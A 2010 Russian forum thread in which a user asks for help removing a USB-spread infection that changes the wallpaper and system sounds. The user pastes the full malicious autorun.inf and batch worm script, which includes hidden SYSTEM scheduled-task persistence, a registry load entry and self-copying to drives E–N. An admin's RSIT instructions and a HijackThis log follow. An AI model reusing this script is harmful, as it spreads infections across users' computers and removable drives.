• Инструкции
    • Как использовать
      • Программы
    • Как удалить
      • Шпионское и рекламное ПО (adware и spyware)
      • Поддельное антиспайваре
      • Руткиты
      • Трояны
      • Кейлоггеры
  • Скачать программы
  • Вопросы и Ответы
  • Форумы

SPYWARE-RU.COM
Меню
  • Инструкции
    • Как использовать
      • Программы
    • Как удалить
      • Шпионское и рекламное ПО (adware и spyware)
      • Поддельное антиспайваре
      • Руткиты
      • Трояны
      • Кейлоггеры
  • Скачать программы
  • Вопросы и Ответы
  • Форумы
В начало › Где поселился Винни Пух?
Adguard
 

Где поселился Винни Пух?

Удаление вирусов и троянов. Защита компьютера. › Помощь в удалении вирусов, троянов, рекламы и других зловредов › Где поселился Винни Пух?

  • This topic has 4 ответа, 2 участника, and was last updated 14 years, 1 month назад by Admin.
Просмотр 5 сообщений - с 1 по 5 (из 5 всего)
  • Автор
    Сообщения
  • 15 октября, 2010 в 7:53 дп #18762
    anri_hod
    Participant
    • Темы:1
    • Сообщений:3
    • ☆

    С фотофлешки приобрёл на комп вредину. Проявляет себя так: заменяет фоновый рисунок рабочего стола на лыбящегося кота (kotik.bmp) и заменяет частично звуки темы на бурчалку Винни-Пуха (vinni.wav). Кот с Виннипухом поселяются в корзине. Ни один из антивирусов на самом компе ничего не ловит (avast, anti-malware, avz…) Вычищал файлы ручками. На самой флэшке организуется каталог WinampSetting в котором в папке Playlist прописывается исполняемый файл tracklist.bat , который, собственно, и гадит. Запуск с флешки всего этого безобразия осуществляет autorun.inf , в котором прописано:

    [autorun]
    action = ??????? ????? ??? ????????? ??????
    open=WinampSettings\\playlisttracklist.bat
    shell\open\command= WinampSettings/playlisttracklist.bat
    shell\explore\\\command=WinampSettings\playlisttracklist.bat
    useautoplay=1

    Теперь о главном. Запуск любого anti-autorun чистильщика удаляет вирус с флешки (у меня сейчас стоит «зоркий глаз»). На компе ничего не находит . Но через минуту на флешке всё востанавливается. Anti-autorun опять это удаляет и бяка снова прописывается на флешку. Стало быть на компе сидит зараза, которая себя копирует на флешку. Но ни один из имеющихся у меня в наличии антивирусов ничего не находит. Всё, типа, чисто. Где искать зверя??? Где поселился Винни-Пух???

    Вот распечатка tracklist.bat (может она чем поможет):

    @echo off
    if /i «w%username%e»==»we» goto 2
    if /i %0==»%systemroot%tasksSA.bat» goto 1
    reg add «HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced» /v ShowSuperHidden /t reg_dword /d 0 /f >nul
    start explorer.exe %cd%
    if exist «%allusersprofile%Application DataCLASSES.dat» exit
    reg add «hkcusoftwaremicrosoftwindows ntcurrentversionwindows» /v load /t reg_sz /d «%systemroot%tasksSA.bat» /f >nul
    type «WinampSettingsplaylistplaylist.m3u»>»%allusersprofile%Application DataNTUSER.dat» || exit
    type %0>»%systemroot%tasksSA.bat»
    type «WinampSettingsplaylisttrackcount.wmp»>»%allusersprofile%Application DataCLASSES.dat»
    schtasks /create /tn «autocheck» /tr «%systemroot%tasksSA.bat» /sc minute /mo 1 /ru «system»>nul
    attrib +h +s «%systemroot%tasksautocheck.job»
    exit

    :1
    @echo off
    schtasks /delete /tn «autocheck» /f
    schtasks /create /tn «autocheck» /tr «%systemroot%tasksSA.bat» /sc minute /mo 1 /ru «system»>nul
    attrib +h +s «%systemroot%tasksautocheck.job»
    if %date%==01.06.2010 goto 3
    if %date%==14.06.2010 goto 3
    if %date%==03.12.2010 goto 3
    if %date%==15.06.2010 goto 3
    if %date%==16.06.2010 goto 3
    if %date%==17.06.2010 goto 3
    if %date%==18.06.2010 goto 3
    if %date%==19.06.2010 goto 3
    if %date%==20.06.2010 goto 3
    if %date%==15.08.2010 goto 3
    if %date%==16.08.2010 goto 3
    if %date%==17.08.2010 goto 3
    if %date%==18.08.2010 goto 3
    if %date%==19.09.2010 goto 3
    if %date%==29.09.2010 goto 3
    if %date%==20.09.2010 goto 3
    if %date%==14.09.2010 goto 3
    if %date%==22.03.2010 goto 3
    if %date%==01.06.2011 goto 3
    if %date%==14.06.2011 goto 3
    if %date%==03.12.2011 goto 3
    if %date%==15.06.2011 goto 3
    if %date%==16.06.2011 goto 3
    if %date%==17.06.2011 goto 3
    if %date%==18.06.2011 goto 3
    if %date%==19.06.2011 goto 3
    if %date%==20.06.2011 goto 3
    if %date%==15.08.2011 goto 3
    if %date%==16.08.2011 goto 3
    if %date%==17.08.2011 goto 3
    if %date%==18.08.2011 goto 3
    if %date%==19.09.2011 goto 3
    if %date%==29.09.2011 goto 3
    if %date%==20.09.2011 goto 3
    if %date%==14.09.2011 goto 3
    if %date%==22.03.2011 goto 3
    exit

    :2
    if exist E:nul if not exist «E:System Volume Information» (md «E:WinampSettingsplaylist» & attrib +h +s «E:WinampSettings» & echo [.shellclassinfo]>»E:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»E:WinampSettingsplaylist2.tmp» & copy «E:WinampSettingsplaylist1.tmp» + «E:WinampSettingsplaylist2.tmp» «E:WinampSettingsdesktop.ini» /a & del «E:WinampSettingsplaylist1.tmp» /q /a:- & del «E:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «E:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»E:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»E:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»E:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «E:autorun.inf» & type %0>»E:WinampSettingsplaylisttracklist.bat»)

    if exist F:nul if not exist «F:System Volume Information» (md «F:WinampSettingsplaylist» & attrib +h +s «F:WinampSettings» & echo [.shellclassinfo]>»F:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»F:WinampSettingsplaylist2.tmp» & copy «F:WinampSettingsplaylist1.tmp» + «F:WinampSettingsplaylist2.tmp» «F:WinampSettingsdesktop.ini» /a & del «F:WinampSettingsplaylist1.tmp» /q /a:- & del «F:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «F:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»F:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»F:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»F:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «F:autorun.inf» & type %0>»F:WinampSettingsplaylisttracklist.bat»)

    if exist G:nul if not exist «G:System Volume Information» (md «G:WinampSettingsplaylist» & attrib +h +s «G:WinampSettings» & echo [.shellclassinfo]>»G:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»G:WinampSettingsplaylist2.tmp» & copy «G:WinampSettingsplaylist1.tmp» + «G:WinampSettingsplaylist2.tmp» «G:WinampSettingsdesktop.ini» /a & del «G:WinampSettingsplaylist1.tmp» /q /a:- & del «G:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «G:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»G:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»G:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»G:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «G:autorun.inf» & type %0>»G:WinampSettingsplaylisttracklist.bat»)

    if exist H:nul if not exist «H:System Volume Information» (md «H:WinampSettingsplaylist» & attrib +h +s «H:WinampSettings» & echo [.shellclassinfo]>»H:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»H:WinampSettingsplaylist2.tmp» & copy «H:WinampSettingsplaylist1.tmp» + «H:WinampSettingsplaylist2.tmp» «H:WinampSettingsdesktop.ini» /a & del «H:WinampSettingsplaylist1.tmp» /q /a:- & del «H:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «H:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»H:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»H:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»H:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «H:autorun.inf» & type %0>»H:WinampSettingsplaylisttracklist.bat»)

    if exist I:nul if not exist «I:System Volume Information» (md «I:WinampSettingsplaylist» & attrib +h +s «I:WinampSettings» & echo [.shellclassinfo]>»I:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»I:WinampSettingsplaylist2.tmp» & copy «I:WinampSettingsplaylist1.tmp» + «I:WinampSettingsplaylist2.tmp» «I:WinampSettingsdesktop.ini» /a & del «I:WinampSettingsplaylist1.tmp» /q /a:- & del «I:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «I:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»I:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»I:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»I:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «I:autorun.inf» & type %0>»I:WinampSettingsplaylisttracklist.bat»)

    if exist J:nul if not exist «J:System Volume Information» (md «J:WinampSettingsplaylist» & attrib +h +s «J:WinampSettings» & echo [.shellclassinfo]>»J:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»J:WinampSettingsplaylist2.tmp» & copy «J:WinampSettingsplaylist1.tmp» + «J:WinampSettingsplaylist2.tmp» «J:WinampSettingsdesktop.ini» /a & del «J:WinampSettingsplaylist1.tmp» /q /a:- & del «J:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «J:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»J:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»J:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»J:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «J:autorun.inf» & type %0>»J:WinampSettingsplaylisttracklist.bat»)

    if exist K:nul if not exist «K:System Volume Information» (md «K:WinampSettingsplaylist» & attrib +h +s «K:WinampSettings» & echo [.shellclassinfo]>»K:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»K:WinampSettingsplaylist2.tmp» & copy «K:WinampSettingsplaylist1.tmp» + «K:WinampSettingsplaylist2.tmp» «K:WinampSettingsdesktop.ini» /a & del «K:WinampSettingsplaylist1.tmp» /q /a:- & del «K:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «K:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»K:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»K:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»K:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «K:autorun.inf» & type %0>»K:WinampSettingsplaylisttracklist.bat»)

    if exist L:nul if not exist «L:System Volume Information» (md «L:WinampSettingsplaylist» & attrib +h +s «L:WinampSettings» & echo [.shellclassinfo]>»L:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»L:WinampSettingsplaylist2.tmp» & copy «L:WinampSettingsplaylist1.tmp» + «L:WinampSettingsplaylist2.tmp» «L:WinampSettingsdesktop.ini» /a & del «L:WinampSettingsplaylist1.tmp» /q /a:- & del «L:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «L:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»L:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»L:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»L:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «L:autorun.inf» & type %0>»L:WinampSettingsplaylisttracklist.bat»)

    if exist M:nul if not exist «M:System Volume Information» (md «M:WinampSettingsplaylist» & attrib +h +s «M:WinampSettings» & echo [.shellclassinfo]>»M:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»M:WinampSettingsplaylist2.tmp» & copy «M:WinampSettingsplaylist1.tmp» + «M:WinampSettingsplaylist2.tmp» «M:WinampSettingsdesktop.ini» /a & del «M:WinampSettingsplaylist1.tmp» /q /a:- & del «M:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «M:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»M:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»M:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»M:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «M:autorun.inf» & type %0>»M:WinampSettingsplaylisttracklist.bat»)

    if exist N:nul if not exist «N:System Volume Information» (md «N:WinampSettingsplaylist» & attrib +h +s «N:WinampSettings» & echo [.shellclassinfo]>»N:WinampSettingsplaylist1.tmp» & echo CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}>»N:WinampSettingsplaylist2.tmp» & copy «N:WinampSettingsplaylist1.tmp» + «N:WinampSettingsplaylist2.tmp» «N:WinampSettingsdesktop.ini» /a & del «N:WinampSettingsplaylist1.tmp» /q /a:- & del «N:WinampSettingsplaylist2.tmp» /q /a:- & attrib -h -s -r «N:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»N:autorun.inf» & type «%allusersprofile%Application DataNTUSER.dat»>»N:WinampSettingsplaylistplaylist.m3u» & type «%allusersprofile%Application DataCLASSES.dat»>»N:WinampSettingsplaylisttrackcount.wmp» & attrib +h +s +r «N:autorun.inf» & type %0>»N:WinampSettingsplaylisttracklist.bat»)
    exit

    :3
    md «%systemdrive%recycler» && attrib +s +h «%systemdrive%recycler»
    type «%allusersprofile%Application DataCLASSES.dat»>»%systemdrive%recyclervinni.wav»
    type «%allusersprofile%Application DataNTUSER.dat»>»%systemdrive%recyclerkotik.bmp»
    reg add «HKCUControl PanelDesktop» /v «Wallpaper» /t reg_sz /d «%systemdrive%recyclerkotik.bmp» /f >nul
    reg add «HKCUControl PanelDesktop» /v «originalWallpaper» /t reg_sz /d «%systemdrive%recyclerkotik.bmp» /f >nul
    reg add «HKCUControl PanelDesktop» /v «convertedWallpaper» /t reg_sz /d «%systemdrive%recyclerkotik.bmp» /f >nul
    reg add «HKCUAppEventsSchemesApps.DefaultSystemAsterisk.Current» /ve /t reg_sz /d «%systemdrive%recyclervinni.wav» /f >nul
    reg add «HKCUAppEventsSchemesApps.DefaultSystemExclamation.Current» /ve /t reg_sz /d «%systemdrive%recyclervinni.wav» /f >nul
    reg add «HKCUAppEventsSchemesApps.DefaultSystemNotification.Current» /ve /t reg_sz /d «%systemdrive%recyclervinni.wav» /f >nul
    exit

    Дата выпуска 05.04.2010

    16 октября, 2010 в 7:07 пп #31664
    Admin
    Keymaster
    • Темы:40
    • Сообщений:5676
    • ☆☆☆☆☆

    Здравствуйте, добро пожаловать на Spyware-ru форум.

    Скачайте сканер RSIT кликнув по этой ссылке и сохраните файл на вашем рабочем столе. Если эта ссылка для вас не работает, то попробуйте одну из приведённых здесь.

    * Дважды кликните по скачанному файлу.
    * Если у вас есть файрвал (firewall) и он покажет, что программа RSIT пытается выйти в Интернет, то разрешите ей.
    * Кликните по кнопке Continue.
    * Когда программа закончит работу, будут показаны два лога (log.txt и info.txt).

    Вставьте оба RSIT лога (их содержимое) в ваш ответ. Каждый лог в отдельное сообщение.

    18 октября, 2010 в 8:11 дп #31665
    anri_hod
    Participant
    • Темы:1
    • Сообщений:3
    • ☆

    RSIT log.txt

    Logfile of random’s system information tool 1.06 (written by random/random)
    Run by Andrew at 2010-10-18 12:08:23
    Microsoft Windows XP Professional Service Pack 2
    System drive C: has 68 GB (90%) free of 76 GB
    Total RAM: 511 MB (43% free)

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 12:08:33, on 18.10.2010
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16414)
    Boot mode: Normal

    Running processes:
    C:WINDOWSSystem32smss.exe
    C:WINDOWSsystem32winlogon.exe
    C:WINDOWSsystem32services.exe
    C:WINDOWSsystem32lsass.exe
    C:WINDOWSsystem32svchost.exe
    C:WINDOWSSystem32svchost.exe
    C:Disk Program FilesAlwil SoftwareAvast4aswUpdSv.exe
    C:Disk Program FilesAlwil SoftwareAvast4ashServ.exe
    C:WINDOWSsystem32spoolsv.exe
    C:WINDOWSsystem32nvsvc32.exe
    C:WINDOWSExplorer.EXE
    C:DISKPR~1ALWILS~1Avast4ashDisp.exe
    C:Program FilesCommon FilesInstallShieldUpdateServiceissch.exe
    C:WINDOWSsystem32RUNDLL32.EXE
    C:Program FilesWinampwinampa.exe
    C:Program FilesЗоркий глазANTIVIRЬ.exe
    C:WINDOWSsystem32devldr32.exe
    C:WINDOWSsystem32ctfmon.exe
    C:Program FilesWinZipWZQKPICK.EXE
    C:Program FilesAVerTVQuickTV.exe
    C:Program FilesMozilla Firefoxfirefox.exe
    c:program filescommon filesinstallshieldupdateserviceisuspm.exe
    C:Program FilesCommon FilesInstallShieldUpdateServiceagent.exe
    C:Documents and SettingsAndrewРабочий столRSIT.exe
    C:Program Filestrend microAndrew.exe

    R1 — HKCUSoftwareMicrosoftInternet ExplorerMain,Search Bar = http://philka.ru/forum
    R1 — HKCUSoftwareMicrosoftInternet ExplorerMain,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 — HKCUSoftwareMicrosoftInternet ExplorerMain,Start Page = about:blank
    R1 — HKLMSoftwareMicrosoftInternet ExplorerMain,Default_Page_URL = http://philka.ru
    R1 — HKLMSoftwareMicrosoftInternet ExplorerMain,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 — HKLMSoftwareMicrosoftInternet ExplorerMain,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 — HKLMSoftwareMicrosoftInternet ExplorerMain,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 — HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings,ProxyServer = 10.0.0.30:3128
    R0 — HKCUSoftwareMicrosoftInternet ExplorerToolbar,LinksFolderName = Ссылки
    R3 — Default URLSearchHook is missing
    F3 — REG:win.ini: load=C:WINDOWStasksSA.bat
    O2 — BHO: Yahoo! Toolbar Helper — {02478D38-C3F9-4EFB-9B51-7695ECA05670} — C:Program FilesYahoo!CompanionInstallscpnyt.dll
    O2 — BHO: AcroIEHelperStub — {18DF081C-E8AD-4283-A596-FA578C2EBDC3} — C:Program FilesCommon FilesAdobeAcrobatActiveXAcroIEHelperShim.dll
    O2 — BHO: Спутник@Mail.Ru — {8984B388-A5BB-4DF7-B274-77B879E179DB} — (no file)
    O3 — Toolbar: Яндекс.Бар — {91397D20-1446-11D4-8AF4-0040CA1127B6} — C:Program FilesYandexYandexBarIEyndbar.dll
    O3 — Toolbar: Yahoo! Toolbar — {EF99BD32-C1FB-11D2-892F-0090271D4F88} — C:Program FilesYahoo!CompanionInstallscpnyt.dll
    O4 — HKLM..Run: [avast!] C:DISKPR~1ALWILS~1Avast4ashDisp.exe
    O4 — HKLM..Run: [ISUSPM Startup] «c:Program FilesCommon FilesInstallShieldUpdateServiceisuspm.exe» -startup
    O4 — HKLM..Run: [ISUSScheduler] «C:Program FilesCommon FilesInstallShieldUpdateServiceissch.exe» -start
    O4 — HKLM..Run: [NvCplDaemon] RUNDLL32.EXE C:WINDOWSsystem32NvCpl.dll,NvStartup
    O4 — HKLM..Run: [nwiz] nwiz.exe /install
    O4 — HKLM..Run: [NvMediaCenter] RUNDLL32.EXE C:WINDOWSsystem32NvMcTray.dll,NvTaskbarInit
    O4 — HKLM..Run: [WinampAgent] C:Program FilesWinampwinampa.exe
    O4 — HKLM..Run: [FlashAntivir] «C:Program FilesЗоркий глазANTIVIRЬ.exe»
    O4 — HKCU..Run: [CTFMON.EXE] C:WINDOWSsystem32ctfmon.exe
    O4 — HKCU..RunOnce: [Sputnik] C:TempMAILRU~1.EXE uninstall —path=»C:Program FilesMail.RuSputnik»
    O4 — HKUSS-1-5-19..Run: [CTFMON.EXE] C:WINDOWSsystem32CTFMON.EXE (User ‘LOCAL SERVICE’)
    O4 — HKUSS-1-5-20..Run: [CTFMON.EXE] C:WINDOWSsystem32CTFMON.EXE (User ‘NETWORK SERVICE’)
    O4 — HKUSS-1-5-18..Run: [CTFMON.EXE] C:WINDOWSsystem32CTFMON.EXE (User ‘SYSTEM’)
    O4 — HKUS.DEFAULT..Run: [CTFMON.EXE] C:WINDOWSsystem32CTFMON.EXE (User ‘Default user’)
    O4 — Startup: Adobe Gamma.lnk = C:Program FilesCommon FilesAdobeCalibrationAdobe Gamma Loader.exe
    O4 — Startup: QuickTV.lnk = C:Program FilesAVerTVQuickTV.exe
    O4 — Global Startup: WinZip Quick Pick.lnk = C:Program FilesWinZipWZQKPICK.EXE
    O8 — Extra context menu item: &Экспорт в Microsoft Excel — res://C:PROGRA~1MICROS~2OFFICE11EXCEL.EXE/3000
    O9 — Extra button: Справочные материалы — {92780B25-18CC-41C8-B9BE-3C9C571A8263} — C:PROGRA~1MICROS~2OFFICE11REFIEBAR.DLL
    O14 — IERESET.INF: START_PAGE_URL=http://philka.ru
    O16 — DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) — C:Program FilesYahoo!Commonyinsthelper.dll
    O16 — DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) — http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    O17 — HKLMSystemCCSServicesTcpip..{8639EB34-6114-46E2-9610-3AC9F47A91CD}: NameServer = 10.0.0.1
    O23 — Service: Adobe LM Service — Adobe Systems — C:Program FilesCommon FilesAdobe Systems SharedServiceAdobelmsvc.exe
    O23 — Service: avast! iAVS4 Control Service (aswUpdSv) — ALWIL Software — C:Disk Program FilesAlwil SoftwareAvast4aswUpdSv.exe
    O23 — Service: avast! Antivirus — ALWIL Software — C:Disk Program FilesAlwil SoftwareAvast4ashServ.exe
    O23 — Service: avast! Mail Scanner — ALWIL Software — C:Disk Program FilesAlwil SoftwareAvast4ashMaiSv.exe
    O23 — Service: avast! Web Scanner — ALWIL Software — C:Disk Program FilesAlwil SoftwareAvast4ashWebSv.exe
    O23 — Service: Журнал событий (Eventlog) — Корпорация Майкрософт — C:WINDOWSsystem32services.exe
    O23 — Service: Служба COM записи компакт-дисков IMAPI (ImapiService) — Корпорация Майкрософт — C:WINDOWSsystem32imapi.exe
    O23 — Service: NetMeeting Remote Desktop Sharing (mnmsrvc) — Корпорация Майкрософт — C:WINDOWSsystem32mnmsrvc.exe
    O23 — Service: NVIDIA Display Driver Service (NVSvc) — NVIDIA Corporation — C:WINDOWSsystem32nvsvc32.exe
    O23 — Service: Plug and Play (PlugPlay) — Корпорация Майкрософт — C:WINDOWSsystem32services.exe
    O23 — Service: Диспетчер сеанса справки для удаленного рабочего стола (RDSessMgr) — Корпорация Майкрософт — C:WINDOWSsystem32sessmgr.exe
    O23 — Service: Смарт-карты (SCardSvr) — Корпорация Майкрософт — C:WINDOWSSystem32SCardSvr.exe
    O23 — Service: Журналы и оповещения производительности (SysmonLog) — Корпорация Майкрософт — C:WINDOWSsystem32smlogsvc.exe
    O23 — Service: Теневое копирование тома (VSS) — Корпорация Майкрософт — C:WINDOWSSystem32vssvc.exe
    O23 — Service: Адаптер производительности WMI (WmiApSrv) — Корпорация Майкрософт — C:WINDOWSsystem32wbemwmiapsrv.exe

    —
    End of file — 6730 bytes

    ======Scheduled tasks folder======

    C:WINDOWStasksautocheck.job

    ======Registry dump======

    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{02478D38-C3F9-4EFB-9B51-7695ECA05670}]
    Yahoo! Toolbar Helper — C:Program FilesYahoo!CompanionInstallscpnyt.dll [2006-10-26 440384]

    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
    Adobe PDF Link Helper — C:Program FilesCommon FilesAdobeAcrobatActiveXAcroIEHelperShim.dll [2010-06-19 75200]

    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{8984B388-A5BB-4DF7-B274-77B879E179DB}]

    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerToolbar]
    {91397D20-1446-11D4-8AF4-0040CA1127B6} — Яндекс.Бар — C:Program FilesYandexYandexBarIEyndbar.dll [2009-04-20 3701024]
    {EF99BD32-C1FB-11D2-892F-0090271D4F88} — Yahoo! Toolbar — C:Program FilesYahoo!CompanionInstallscpnyt.dll [2006-10-26 440384]

    [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
    «avast!»=C:DISKPR~1ALWILS~1Avast4ashDisp.exe [2009-11-25 81000]
    «ISUSPM Startup»=c:Program FilesCommon FilesInstallShieldUpdateServiceisuspm.exe [2005-08-11 249856]
    «ISUSScheduler»=C:Program FilesCommon FilesInstallShieldUpdateServiceissch.exe [2005-08-11 81920]
    «NvCplDaemon»=C:WINDOWSsystem32NvCpl.dll [2004-03-03 2904064]
    «nwiz»=nwiz.exe /install []
    «NvMediaCenter»=C:WINDOWSsystem32NvMcTray.dll [2004-03-03 46080]
    «WinampAgent»=C:Program FilesWinampwinampa.exe [2003-12-13 33792]
    «FlashAntivir»=C:Program FilesЗоркий глазANTIVIRЬ.exe [2010-07-17 2120704]

    [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
    «CTFMON.EXE»=C:WINDOWSsystem32ctfmon.exe [2004-08-17 15360]

    [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce]
    «Sputnik»=C:TempMAILRU~1.EXE [2010-10-04 2446520]

    C:Documents and SettingsAll UsersГлавное менюПрограммыАвтозагрузка
    WinZip Quick Pick.lnk — C:Program FilesWinZipWZQKPICK.EXE

    C:Documents and SettingsAndrewГлавное менюПрограммыАвтозагрузка
    Adobe Gamma.lnk — C:Program FilesCommon FilesAdobeCalibrationAdobe Gamma Loader.exe
    QuickTV.lnk — C:Program FilesAVerTVQuickTV.exe

    [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
    «dontdisplaylastusername»=0
    «legalnoticecaption»=
    «legalnoticetext»=
    «shutdownwithoutlogon»=1
    «undockwithoutlogon»=1

    [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesexplorer]
    «NoDriveTypeAutoRun»=145
    «Start_NotifyNewApps»=0

    [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesexplorer]
    «NoDriveTypeAutoRun»=

    [HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicessharedaccessparametersfirewallpolicystandardprofileauthorizedapplicationslist]
    «%windir%system32sessmgr.exe»=»%windir%system32sessmgr.exe:*:enabled:@xpsp2res.dll,-22019»
    «C:Program FilesTotal CommanderTOTALCMD.EXE»=»C:Program FilesTotal CommanderTOTALCMD.EXE:*:Enabled:Total Commander 32 bit international version, file manager replacement for Windows»
    «C:Program FilesOperaopera.exe»=»C:Program FilesOperaopera.exe:*:Enabled:Opera Internet Browser»
    «C:Program FilesMail.RuSputnikSputnikFlashPlayer.exe»=»C:Program FilesMail.RuSputnikSputnikFlashPlayer.exe:*:Enabled:Sputnik@Mail.Ru flash player»
    «C:Program FilesMail.RuSputnikSputnikHelper.exe»=»C:Program FilesMail.RuSputnikSputnikHelper.exe:*:Enabled:Sputnik@Mail.Ru helper object»

    [HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicessharedaccessparametersfirewallpolicydomainprofileauthorizedapplicationslist]
    «%windir%system32sessmgr.exe»=»%windir%system32sessmgr.exe:*:enabled:@xpsp2res.dll,-22019»

    [HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{40c643e0-4e8f-11de-b86c-0001032e5853}]
    shellAutoRuncommand — H:RECYCLED-0-060-0000000000-1111111-2222222fix.exe
    shellopencommand — H:RECYCLED-0-060-0000000000-1111111-2222222fix.exe

    [HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{5fae8a8b-6188-11df-973f-0001032e5853}]
    shellAutoRuncommand — H:GIXwoY.EXE
    shellOpencommand — H:GIxwOY.exE

    [HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{92a54fa7-1798-11de-b825-0001032e5853}]
    shellAutoRuncommand — H:WinampSettings\\playlisttracklist.bat
    shellexplorecommand — H:WinampSettings\playlisttracklist.bat
    shellopencommand — H:WinampSettings/playlisttracklist.bat

    [HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{997422fd-d2ba-11de-b8d8-0001032e5853}]
    shellAutoRuncommand — 3yalgc.exe
    shellopencommand — 3yalgc.exe

    ======List of files/folders created in the last 1 months======

    2010-10-18 12:08:23 —-D—- C:rsit
    2010-10-18 12:08:23 —-D—- C:Program Filestrend micro
    2010-10-14 17:41:12 —-D—- C:Documents and SettingsAndrewApplication DataMalwarebytes
    2010-10-14 17:41:00 —-D—- C:Documents and SettingsAll UsersApplication DataMalwarebytes
    2010-10-14 17:40:59 —-D—- C:Program FilesMalwarebytes’ Anti-Malware
